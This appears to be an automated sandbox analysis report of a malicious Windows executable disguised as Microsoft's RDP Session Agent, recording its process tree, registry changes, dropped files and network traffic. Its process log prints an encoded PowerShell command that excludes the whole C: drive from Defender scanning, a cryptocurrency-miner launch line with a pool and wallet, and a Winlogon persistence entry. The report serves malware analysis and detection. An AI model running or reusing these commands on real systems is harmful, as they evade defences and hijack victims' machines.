File name: | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe |
Full analysis: | https://app.any.run/tasks/b97a9994-3802-4ebe-9074-2fbcb4e7048e |
Verdict: | Malicious activity |
Analysis date: | July 22, 2024, 15:14:56 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows |
MD5: | 2CA5492F9DBCDAAB3FACF1768CAE5C6D |
SHA1: | 1AA94BEA1A57F4D6933258BAF9E5D6A17B332ED7 |
SHA256: | 1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130 |
SSDEEP: | 98304:B6GMWWCdl6k1/ZznpySti7vsEzz58ys5FNDFY7N/978+jf+T+MSvy6MCMx8WNRT7:pAoicm/B1 |
.exe | | | Generic Win/DOS Executable (50) |
---|---|---|
.exe | | | DOS Executable Generic (49.9) |
AssemblyVersion: | 10.0.17763.1 |
---|---|
ProductVersion: | 10.0.17763.1 |
ProductName: | Microsoft® Windows® Operating System |
OriginalFileName: | Mfceum-4.exe |
LegalTrademarks: | - |
LegalCopyright: | © Microsoft Corporation. All rights reserved. |
InternalName: | Mfceum-4.exe |
FileVersion: | 10.0.17763.1 |
FileDescription: | RDP Session Agent |
CompanyName: | Microsoft Corporation |
Comments: | RDP Session Agent |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 10.0.17763.1 |
FileVersionNumber: | 10.0.17763.1 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x0000 |
UninitializedDataSize: | - |
InitializedDataSize: | 69120 |
CodeSize: | 6704128 |
LinkerVersion: | 48 |
PEType: | PE32+ |
ImageFileCharacteristics: | Executable, Large address aware |
TimeStamp: | 2022:09:19 14:55:19+00:00 |
MachineType: | AMD AMD64 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6148 | "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" | C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: RDP Session Agent Exit code: 0 Version: 10.0.17763.1 Modules
| |||||||||||||||
6876 | "C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" & EXIT | C:\Windows\System32\cmd.exe | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
8180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6976 | "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" | C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: RDP Session Agent Exit code: 0 Version: 10.0.17763.1 Modules
| |||||||||||||||
7032 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5464 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7240 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft .NET Assembly Registration Utility Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
1288 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1596 | "C:\Users\admin\AppData\Roamingsigverif.exe" --algo EQUI144_5 --pers BgoldPoW --pool btg.2miners.com:4040 --user GLW2ipMiWNpeMAnrh2sW9pZ6rBo65GzY1r.Rig --log off pause | C:\Users\admin\AppData\Roamingsigverif.exe | RegAsm.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 3221225477 Modules
| |||||||||||||||
884 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | Roamingsigverif.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
Operation: | write | Name: | Shell |
Value: explorer.exe,"C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe", | |||
(PID) Process: | (7240) RegAsm.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Roamingsigverif._66f25098356f7f52a4e075b57a8aebce9f615f7_ca662a69_c612c3cc-6743-4773-93f8-e23c9a29769d\Report.wer | — | |
MD5:— | SHA256:— | |||
3944 | WerFault.exe | C:\Users\admin\AppData\Local\CrashDumps\Roamingsigverif.exe.1596.dmp | — | |
MD5:— | SHA256:— | |||
3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0AA.tmp.xml | xml | |
MD5:CBD13A519A80BD52B3AF9386DDB1F023 | SHA256:40C11D8BBACF236568C5B012D829ED6DB275101249628037B8EF8F5D6120247B | |||
3944 | WerFault.exe | C:\WINDOWS\AppCompat\Programs\Amcache.hve | binary | |
MD5:E365D7D9F6602071C717907929378F50 | SHA256:2C31745D7CA5677E973A41635246C9059813AF48EB4B0A7E9A5817B9D5EC4230 | |||
3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD069.tmp.dmp | binary | |
MD5:B034C4B81EA7504DCF8DD7B6BAB5B5B5 | SHA256:F4B17E156E23527EAB02FC137DA53AFFDAE3DC527A8596C6DCAA740468F4AD46 | |||
3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD099.tmp.WERInternalMetadata.xml | xml | |
MD5:D3ADB0C168CFA435ED762A0A77C32A4C | SHA256:BCF64DECE86B2E1EDD067682D919C58BB63DF209D7E31CE2DA01C005E8C9CC41 | |||
7032 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:33F9F4F94DCD09FA4B2CBC0D548A56AA | SHA256:099914A0200B9C1913C98776287829369DAF37B66511C915634D09F861B8B234 | |||
7240 | RegAsm.exe | C:\Users\admin\AppData\Roamingsigverif.exe | executable | |
MD5:73278D880B15CC091A24498E5E435AD8 | SHA256:AC63628939F91B381816DCFE792B123DF57A589C0365D4BB10BFFE0F6645D026 | |||
7032 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1er4xbn.qel.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe | executable | |
MD5:2CA5492F9DBCDAAB3FACF1768CAE5C6D | SHA256:1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 13.85.23.86:443 | https://slscr.update.microsoft.com/sls/ping | unknown | — | — | — |
— | — | GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 200 | 20.3.187.198:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | — |
— | — | GET | 304 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | POST | — | 20.190.160.14:443 | https://login.live.com/RST2.srf | unknown | — | — | — |
— | — | GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | compressed | 23.9 Kb | — |
— | — | POST | 401 | 4.208.221.206:443 | https://licensing.mp.microsoft.com/v7.0/licenses/content | unknown | binary | 340 b | — |
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4716 | svchost.exe | 20.190.159.23:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5620 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4032 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
7856 | svchost.exe | 4.208.221.206:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2760 | svchost.exe | 40.115.3.253:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1140 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4308 | SIHClient.exe | 52.165.165.26:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
5620 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
Domain | IP | Reputation |
---|---|---|
login.live.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
licensing.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Generic Protocol Command Decode | SURICATA HTTP Request unrecognized authorization method |